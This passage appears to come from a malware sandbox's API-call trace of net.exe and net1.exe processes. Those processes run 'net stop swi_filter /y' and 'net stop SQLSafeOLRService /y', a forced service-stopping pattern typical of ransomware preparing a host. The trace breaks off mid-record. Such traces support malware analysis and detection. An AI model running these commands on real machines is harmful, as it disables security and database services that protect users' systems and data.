[0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 476 os_tid = 0x91c [0212.074] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x11fdd0 | out: lpSystemTimeAsFileTime=0x11fdd0*(dwLowDateTime=0x4798ede0, dwHighDateTime=0x1d57a87)) [0212.074] GetCurrentProcessId () returned 0x928 [0212.074] GetCurrentThreadId () returned 0x91c [0212.074] GetTickCount () returned 0x116e985 [0212.074] QueryPerformanceCounter (in: lpPerformanceCount=0x11fdc8 | out: lpPerformanceCount=0x11fdc8*=33235855335) returned 1 [0212.074] GetModuleHandleA (lpModuleName=0x0) returned 0x540000 [0212.074] __set_app_type (_Type=0x1) [0212.074] __p__fmode () returned 0x74eb31f4 [0212.074] __p__commode () returned 0x74eb31fc [0212.074] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x54ffe6) returned 0x0 [0212.075] __getmainargs (in: _Argc=0x559064, _Argv=0x55906c, _Env=0x559068, _DoWildCard=0, _StartInfo=0x559024 | out: _Argc=0x559064, _Argv=0x55906c, _Env=0x559068) returned 0 [0212.075] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0212.075] GetConsoleOutputCP () returned 0x1b5 [0212.075] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x559080 | out: lpCPInfo=0x559080) returned 1 [0212.075] SetThreadUILanguage (LangId=0x0) returned 0x409 [0212.078] sprintf_s (in: _DstBuf=0x11fd88, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0212.078] setlocale (category=0, locale=".437") returned="English_United States.437" [0212.080] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0212.080] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0212.080] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop swi_filter /y" [0212.080] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x11fb54, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0212.080] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x0, Size=0x68) returned 0x713c10 [0212.080] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0212.081] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x11fd58 | out: Buffer=0x11fd58*=0x711c70) returned 0x0 [0212.081] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x11fd58 | out: Buffer=0x11fd58*=0x711c88) returned 0x0 [0212.081] _fileno (_File=0x74eb2900) returned -2 [0212.081] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0212.081] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0212.081] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0212.081] _wcsicmp (_String1="config", _String2="stop") returned -16 [0212.081] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0212.081] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0212.081] _wcsicmp (_String1="file", _String2="stop") returned -13 [0212.081] _wcsicmp (_String1="files", _String2="stop") returned -13 [0212.081] _wcsicmp (_String1="group", _String2="stop") returned -12 [0212.081] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0212.081] _wcsicmp (_String1="help", _String2="stop") returned -11 [0212.081] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0212.081] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0212.081] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0212.081] _wcsicmp (_String1="session", _String2="stop") returned -15 [0212.081] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0212.081] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0212.081] _wcsicmp (_String1="share", _String2="stop") returned -12 [0212.081] _wcsicmp (_String1="start", _String2="stop") returned -14 [0212.081] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0212.081] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0212.081] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0212.081] _wcsicmp (_String1="accounts", _String2="swi_filter") returned -18 [0212.081] _wcsicmp (_String1="computer", _String2="swi_filter") returned -16 [0212.081] _wcsicmp (_String1="config", _String2="swi_filter") returned -16 [0212.082] _wcsicmp (_String1="continue", _String2="swi_filter") returned -16 [0212.082] _wcsicmp (_String1="cont", _String2="swi_filter") returned -16 [0212.082] _wcsicmp (_String1="file", _String2="swi_filter") returned -13 [0212.082] _wcsicmp (_String1="files", _String2="swi_filter") returned -13 [0212.082] _wcsicmp (_String1="group", _String2="swi_filter") returned -12 [0212.082] _wcsicmp (_String1="groups", _String2="swi_filter") returned -12 [0212.082] _wcsicmp (_String1="help", _String2="swi_filter") returned -11 [0212.082] _wcsicmp (_String1="helpmsg", _String2="swi_filter") returned -11 [0212.082] _wcsicmp (_String1="localgroup", _String2="swi_filter") returned -7 [0212.082] _wcsicmp (_String1="pause", _String2="swi_filter") returned -3 [0212.082] _wcsicmp (_String1="session", _String2="swi_filter") returned -18 [0212.082] _wcsicmp (_String1="sessions", _String2="swi_filter") returned -18 [0212.082] _wcsicmp (_String1="sess", _String2="swi_filter") returned -18 [0212.082] _wcsicmp (_String1="share", _String2="swi_filter") returned -15 [0212.082] _wcsicmp (_String1="start", _String2="swi_filter") returned -3 [0212.082] _wcsicmp (_String1="stats", _String2="swi_filter") returned -3 [0212.082] _wcsicmp (_String1="statistics", _String2="swi_filter") returned -3 [0212.082] _wcsicmp (_String1="stop", _String2="swi_filter") returned -3 [0212.082] _wcsicmp (_String1="time", _String2="swi_filter") returned 1 [0212.082] _wcsicmp (_String1="user", _String2="swi_filter") returned 2 [0212.082] _wcsicmp (_String1="users", _String2="swi_filter") returned 2 [0212.082] _wcsicmp (_String1="msg", _String2="swi_filter") returned -6 [0212.082] _wcsicmp (_String1="messenger", _String2="swi_filter") returned -6 [0212.082] _wcsicmp (_String1="receiver", _String2="swi_filter") returned -1 [0212.082] _wcsicmp (_String1="rcv", _String2="swi_filter") returned -1 [0212.082] _wcsicmp (_String1="netpopup", _String2="swi_filter") returned -5 [0212.082] _wcsicmp (_String1="redirector", _String2="swi_filter") returned -1 [0212.082] _wcsicmp (_String1="redir", _String2="swi_filter") returned -1 [0212.082] _wcsicmp (_String1="rdr", _String2="swi_filter") returned -1 [0212.082] _wcsicmp (_String1="workstation", _String2="swi_filter") returned 4 [0212.082] _wcsicmp (_String1="work", _String2="swi_filter") returned 4 [0212.082] _wcsicmp (_String1="wksta", _String2="swi_filter") returned 4 [0212.082] _wcsicmp (_String1="prdr", _String2="swi_filter") returned -3 [0212.082] _wcsicmp (_String1="devrdr", _String2="swi_filter") returned -15 [0212.082] _wcsicmp (_String1="lanmanworkstation", _String2="swi_filter") returned -7 [0212.082] _wcsicmp (_String1="server", _String2="swi_filter") returned -18 [0212.082] _wcsicmp (_String1="svr", _String2="swi_filter") returned -1 [0212.083] _wcsicmp (_String1="srv", _String2="swi_filter") returned -5 [0212.083] _wcsicmp (_String1="lanmanserver", _String2="swi_filter") returned -7 [0212.083] _wcsicmp (_String1="alerter", _String2="swi_filter") returned -18 [0212.083] _wcsicmp (_String1="netlogon", _String2="swi_filter") returned -5 [0212.083] _wcsupr (in: _String="swi_filter" | out: _String="SWI_FILTER") returned="SWI_FILTER" [0212.083] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x7154c8 [0212.086] GetServiceKeyNameW (in: hSCManager=0x7154c8, lpDisplayName="SWI_FILTER", lpServiceName=0x55aaf0, lpcchBuffer=0x11fcf4 | out: lpServiceName="", lpcchBuffer=0x11fcf4) returned 0 [0212.086] _wcsicmp (_String1="msg", _String2="SWI_FILTER") returned -6 [0212.086] _wcsicmp (_String1="messenger", _String2="SWI_FILTER") returned -6 [0212.086] _wcsicmp (_String1="receiver", _String2="SWI_FILTER") returned -1 [0212.086] _wcsicmp (_String1="rcv", _String2="SWI_FILTER") returned -1 [0212.086] _wcsicmp (_String1="redirector", _String2="SWI_FILTER") returned -1 [0212.086] _wcsicmp (_String1="redir", _String2="SWI_FILTER") returned -1 [0212.086] _wcsicmp (_String1="rdr", _String2="SWI_FILTER") returned -1 [0212.086] _wcsicmp (_String1="workstation", _String2="SWI_FILTER") returned 4 [0212.086] _wcsicmp (_String1="work", _String2="SWI_FILTER") returned 4 [0212.086] _wcsicmp (_String1="wksta", _String2="SWI_FILTER") returned 4 [0212.086] _wcsicmp (_String1="prdr", _String2="SWI_FILTER") returned -3 [0212.086] _wcsicmp (_String1="devrdr", _String2="SWI_FILTER") returned -15 [0212.086] _wcsicmp (_String1="lanmanworkstation", _String2="SWI_FILTER") returned -7 [0212.086] _wcsicmp (_String1="server", _String2="SWI_FILTER") returned -18 [0212.086] _wcsicmp (_String1="svr", _String2="SWI_FILTER") returned -1 [0212.086] _wcsicmp (_String1="srv", _String2="SWI_FILTER") returned -5 [0212.087] _wcsicmp (_String1="lanmanserver", _String2="SWI_FILTER") returned -7 [0212.087] _wcsicmp (_String1="alerter", _String2="SWI_FILTER") returned -18 [0212.087] _wcsicmp (_String1="netlogon", _String2="SWI_FILTER") returned -5 [0212.087] NetServiceControl (in: servername=0x0, service="SWI_FILTER", opcode=0x0, arg=0x0, bufptr=0x11fcf0 | out: bufptr=0x11fcf0) returned 0x889 [0212.087] wcscpy_s (in: _Destination=0x55a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0212.088] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74a10000 [0212.088] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74a10000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x55b338, nSize=0x800, Arguments=0x559dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0212.089] GetFileType (hFile=0x26c) returned 0x3 [0212.089] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x713ff8 [0212.089] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x713ff8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0212.090] WriteFile (in: hFile=0x26c, lpBuffer=0x713ff8, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x11fc30, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x11fc30, lpOverlapped=0x0) returned 0 [0212.090] LocalFree (hMem=0x713ff8) returned 0x0 [0212.090] GetFileType (hFile=0x26c) returned 0x3 [0212.090] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x7162a0 [0212.090] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x7162a0, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nq", lpUsedDefaultChar=0x0) returned 2 [0212.090] WriteFile (in: hFile=0x26c, lpBuffer=0x7162a0, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x11fc30, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x11fc30, lpOverlapped=0x0) returned 0 [0212.090] LocalFree (hMem=0x7162a0) returned 0x0 [0212.090] _ultow (in: _Dest=0x889, _Radix=1178720 | out: _Dest=0x889) returned="2185" [0212.090] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74a10000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x55b338, nSize=0x800, Arguments=0x559dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0212.090] GetFileType (hFile=0x26c) returned 0x3 [0212.090] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x7162a0 [0212.090] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x7162a0, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0212.090] WriteFile (in: hFile=0x26c, lpBuffer=0x7162a0, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x11fc3c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x11fc3c, lpOverlapped=0x0) returned 0 [0212.090] LocalFree (hMem=0x7162a0) returned 0x0 [0212.090] GetFileType (hFile=0x26c) returned 0x3 [0212.090] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x7162a0 [0212.090] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x7162a0, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nq", lpUsedDefaultChar=0x0) returned 2 [0212.090] WriteFile (in: hFile=0x26c, lpBuffer=0x7162a0, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x11fc3c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x11fc3c, lpOverlapped=0x0) returned 0 [0212.090] LocalFree (hMem=0x7162a0) returned 0x0 [0212.091] NetApiBufferFree (Buffer=0x711c70) returned 0x0 [0212.091] NetApiBufferFree (Buffer=0x711c88) returned 0x0 [0212.091] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop swi_filter /y" [0212.091] exit (_Code=2) Process: id = "304" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x4cfbc000" os_pid = "0x9f4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop SQLSafeOLRService /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 477 os_tid = 0x95c Process: id = "305" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x637a8000" os_pid = "0x8a0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "304" os_parent_pid = "0x9f4" cmd_line = "C:\\Windows\\system32\\net1 stop SQLSafeOLRService /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 478 os_tid = 0x89c [0212.232] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x27f92c | out: lpSystemTimeAsFileTime=0x27f92c*(dwLowDateTime=0x47b0bba0, dwHighDateTime=0x1d57a87)) [0212.232] GetCurrentProcessId () returned 0x8a0 [0212.232] GetCurrentThreadId () returned 0x89c [0212.232] GetTickCount () returned 0x116ea21 [0212.232] QueryPerformanceCounter (in: lpPerformanceCount=0x27f924 | out: lpPerformanceCount=0x27f924*=33251672446) returned 1 [0212.232] GetModuleHandleA (lpModuleName=0x0) returned 0x3c0000 [0212.232] __set_app_type (_Type=0x1) [0212.232] __p__fmode () returned 0x74eb31f4 [0212.232] __p__commode () returned 0x74eb31fc [0212.233] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x3cffe6) returned 0x0 [0212.233] __getmainargs (in: _Argc=0x3d9064, _Argv=0x3d906c, _Env=0x3d9068, _DoWildCard=0, _StartInfo=0x3d9024 | out: _Argc=0x3d9064, _Argv=0x3d906c, _Env=0x3d9068) returned 0 [0212.233] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0212.233] GetConsoleOutputCP () returned 0x1b5 [0212.233] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3d9080 | out: lpCPInfo=0x3d9080) returned 1 [0212.233] SetThreadUILanguage (LangId=0x0) returned 0x409 [0212.237] sprintf_s (in: _DstBuf=0x27f8e4, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0212.237] setlocale (category=0, locale=".437") returned="English_United States.437" [0212.239] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0212.239] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0212.239] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop SQLSafeOLRService /y" [0212.239] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x27f6b0, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0212.239] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x76) returned 0x4af788 [0212.239] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0212.239] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x27f8b4 | out: Buffer=0x27f8b4*=0x4b1c78) returned 0x0 [0212.239] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x27f8b4 | out: Buffer=0x27f8b4*=0x4b1c90) returned 0x0 [0212.239] _fileno (_File=0x74eb2900) returned -2 [0212.240] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0212.240] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0212.240] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0212.240] _wcsicmp (_String1="config", _String2="stop") returned -16 [0212.240] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0212.240] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0212.240] _wcsicmp (_String1="file", _String2="stop") returned -13 [0212.240] _wcsicmp (_String1="files", _String2="stop") returned -13 [0212.240] _wcsicmp (_String1="group", _String2="stop") returned -12 [0212.240] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0212.240] _wcsicmp (_String1="help", _String2="stop") returned -11 [0212.240] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0212.240] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0212.240] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0212.240] _wcsicmp (_String1="session", _String2="stop") returned -15 [0212.240] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0212.240] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0212.240] _wcsicmp (_String1="share", _String2="stop") returned -12 [0212.240] _wcsicmp (_String1="start", _String2="stop") returned -14 [0212.240] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0212.240] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0212.240] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0212.240] _wcsicmp (_String1="accounts", _String2="SQLSafeOLRService") returned -18 [0212.240] _wcsicmp (_String1="computer", _String2="SQLSafeOLRService") returned -16 [0212.240] _wcsicmp (_String1="config", _String2="SQLSafeOLRService") returned -16 [0212.240] _wcsicmp (_String1="continue", _String2="SQLSafeOLRService") returned -16 [0212.240] _wcsicmp (_String1="cont", _String2="SQLSafeOLRService") returned -16 [0212.240] _wcsicmp (_String1="file", _String2="SQLSafeOLRService") returned -13 [0212.241] _wcsicmp (_String1="files", _String2="SQLSafeOLRService") returned -13 [0212.241] _wcsicmp (_String1="group", _String2="SQLSafeOLRService") returned -12 [0212.241] _wcsicmp (_String1="groups", _String2="SQLSafeOLRService") returned -12 [0212.241] _wcsicmp (_String1="help", _String2="SQLSafeOLRService") returned -11 [0212.241] _wcsicmp (_String1="helpmsg", _String2="SQLSafeOLRService") returned -11 [0212.241] _wcsicmp (_String1="localgroup", _String2="SQLSafeOLRService") returned -7 [0212.241] _wcsicmp (_String1="pause", _String2="SQLSafeOLRService") returned -3 [0212.241] _wcsicmp (_String1="session", _String2="SQLSafeOLRService") returned -12 [0212.241] _wcsicmp (_String1="sessions", _String2="SQLSafeOLRService") returned -12 [0212.241] _wcsicmp (_String1="sess", _String2="SQLSafeOLRService") returned -12 [0212.241] _wcsicmp (_String1="share", _String2="SQLSafeOLRService") returned -9 [0212.241] _wcsicmp (_String1="start", _String2="SQLSafeOLRService") returned 3 [0212.241] _wcsicmp (_String1="stats", _String2="SQLSafeOLRService") returned 3 [0212.241] _wcsicmp (_String1="statistics", _String2="SQLSafeOLRService") returned 3 [0212.241] _wcsicmp (_String1="stop", _String2="SQLSafeOLRService") returned 3 [0212.241] _wcsicmp (_String1="time", _String2="SQLSafeOLRService") returned 1 [0212.241] _wcsicmp (_String1="user", _String2="SQLSafeOLRService") returned 2 [0212.241] _wcsicmp (_String1="users", _String2="SQLSafeOLRService") returned 2 [0212.241] _wcsicmp (_String1="msg", _String2="SQLSafeOLRService") returned -6 [0212.241] _wcsicmp (_String1="messenger", _String2="SQLSafeOLRService") returned -6 [0212.241] _wcsicmp (_String1="receiver", _String2="SQLSafeOLRService") returned -1 [0212.241] _wcsicmp (_String1="rcv", _String2="SQLSafeOLRService") returned -1 [0212.241] _wcsicmp (_String1="netpopup", _String2="SQLSafeOLRService") returned -5 [0212.241] _wcsicmp (_String1="redirector", _String2="SQLSafeOLRService") returned -1 [0212.241] _wcsicmp (_String1="redir", _String2="SQLSafeOLRService") returned -1 [0212.241] _wcsicmp (_String1="rdr", _String2="SQLSafeOLRService") returned -1 [0212.241] _wcsicmp (_String1="workstation", _String2="SQLSafeOLRService") returned 4 [0212.241] _wcsicmp (_String1="work", _String2="SQLSafeOLRService") returned 4 [0212.241] _wcsicmp (_String1="wksta", _String2="SQLSafeOLRService") returned 4 [0212.241] _wcsicmp (_String1="prdr", _String2="SQLSafeOLRService") returned -3 [0212.241] _wcsicmp (_String1="devrdr", _String2="SQLSafeOLRService") returned -15 [0212.241] _wcsicmp (_String1="lanmanworkstation", _String2="SQLSafeOLRService") returned -7 [0212.241] _wcsicmp (_String1="server", _String2="SQLSafeOLRService") returned -12 [0212.241] _wcsicmp (_String1="svr", _String2="SQLSafeOLRService") returned 5 [0212.241] _wcsicmp (_String1="srv", _String2="SQLSafeOLRService") returned 1 [0212.241] _wcsicmp (_String1="lanmanserver", _String2="SQLSafeOLRService") returned -7 [0212.241] _wcsicmp (_String1="alerter", _String2="SQLSafeOLRService") returned -18 [0212.241] _wcsicmp (_String1="netlogon", _String2="SQLSafeOLRService") returned -5 [0212.242] _wcsupr (in: _String="SQLSafeOLRService" | out: _String="SQLSAFEOLRSERVICE") returned="SQLSAFEOLRSERVICE" [0212.242] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x4b5460 [0212.244] GetServiceKeyNameW (in: hSCManager=0x4b5460, lpDisplayName="SQLSAFEOLRSERVICE", lpServiceName=0x3daaf0, lpcchBuffer=0x27f850 | out: lpServiceName="", lpcchBuffer=0x27f850) returned 0 [0212.245] _wcsicmp (_String1="msg", _String2="SQLSAFEOLRSERVICE") returned -6 [0212.245] _wcsicmp (_String1="messenger", _String2="SQLSAFEOLRSERVICE") returned -6 [0212.245] _wcsicmp (_String1="receiver", _String2="SQLSAFEOLRSERVICE") returned -1 [0212.245] _wcsicmp (_String1="rcv", _String2="SQLSAFEOLRSERVICE") returned -1 [0212.245] _wcsicmp (_String1="redirector", _String2="SQLSAFEOLRSERVICE") returned -1 [0212.245] _wcsicmp (_String1="redir", _String2="SQLSAFEOLRSERVICE") returned -1 [0212.245] _wcsicmp (_String1="rdr", _String2="SQLSAFEOLRSERVICE") returned -1 [0212.245] _wcsicmp (_String1="workstation", _String2="SQLSAFEOLRSERVICE") returned 4 [0212.245] _wcsicmp (_String1="work", _String2="SQLSAFEOLRSERVICE") returned 4 [0212.245] _wcsicmp (_String1="wksta", _String2="SQLSAFEOLRSERVICE") returned 4 [0212.245] _wcsicmp (_String1="prdr", _String2="SQLSAFEOLRSERVICE") returned -3 [0212.245] _wcsicmp (_String1="devrdr", _String2="SQLSAFEOLRSERVICE") returned -15 [0212.245] _wcsicmp (_String1="lanmanworkstation", _String2="SQLSAFEOLRSERVICE") returned -7 [0212.245] _wcsicmp (_String1="server", _String2="SQLSAFEOLRSERVICE") returned -12 [0212.245] _wcsicmp (_String1="svr", _String2="SQLSAFEOLRSERVICE") returned 5 [0212.245] _wcsicmp (_String1="srv", _String2="SQLSAFEOLRSERVICE") returned 1 [0212.245] _wcsicmp (_String1="lanmanserver", _String2="SQLSAFEOLRSERVICE") returned -7 [0212.245] _wcsicmp (_String1="alerter", _String2="SQLSAFEOLRSERVICE") returned -18 [0212.245] _wcsicmp (_String1="netlogon", _String2="SQLSAFEOLRSERVICE") returned -5 [0212.245] NetServiceControl (in: servername=0x0, service="SQLSAFEOLRSERVICE", opcode=0x0, arg=0x0, bufptr=0x27f84c | out: bufptr=0x27f84c) returned 0x889 [0212.246] wcscpy_s (in: _Destination=0x3da4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0212.246] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74a80000 [0212.247] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74a80000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x3db338, nSize=0x800, Arguments=0x3d9dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0212.248] GetFileType (hFile=0x26c) returned 0x3 [0212.248] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x4b3f90 [0212.248] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x4b3f90, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0212.248] WriteFile (in: hFile=0x26c, lpBuffer=0x4b3f90, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x27f78c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x27f78c, lpOverlapped=0x0) returned 0 [0212.248] LocalFree (hMem=0x4b3f90) returned 0x0 [0212.248] GetFileType (hFile=0x26c) returned 0x3 [0212.248] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x4b6238 [0212.248] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x4b6238, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nK", lpUsedDefaultChar=0x0) returned 2 [0212.248] WriteFile (in: hFile=0x26c, lpBuffer=0x4b6238, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x27f78c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x27f78c, lpOverlapped=0x0) returned 0 [0212.248] LocalFree (hMem=0x4b6238) returned 0x0 [0212.248] _ultow (in: _Dest=0x889, _Radix=2619324 | out: _Dest=0x889) returned="2185" [0212.249] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74a80000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x3db338, nSize=0x800, Arguments=0x3d9dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0212.249] GetFileType (hFile=0x26c) returned 0x3 [0212.249] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x4b6238 [0212.249] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x4b6238, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0212.249] WriteFile (in: hFile=0x26c, lpBuffer=0x4b6238, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x27f798, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x27f798, lpOverlapped=0x0) returned 0 [0212.249] LocalFree (hMem=0x4b6238) returned 0x0 [0212.249] GetFileType (hFile=0x26c) returned 0x3 [0212.249] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x4b6238 [0212.249] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x4b6238, cbMultiByte=4, lpDefaultChar=0x0, 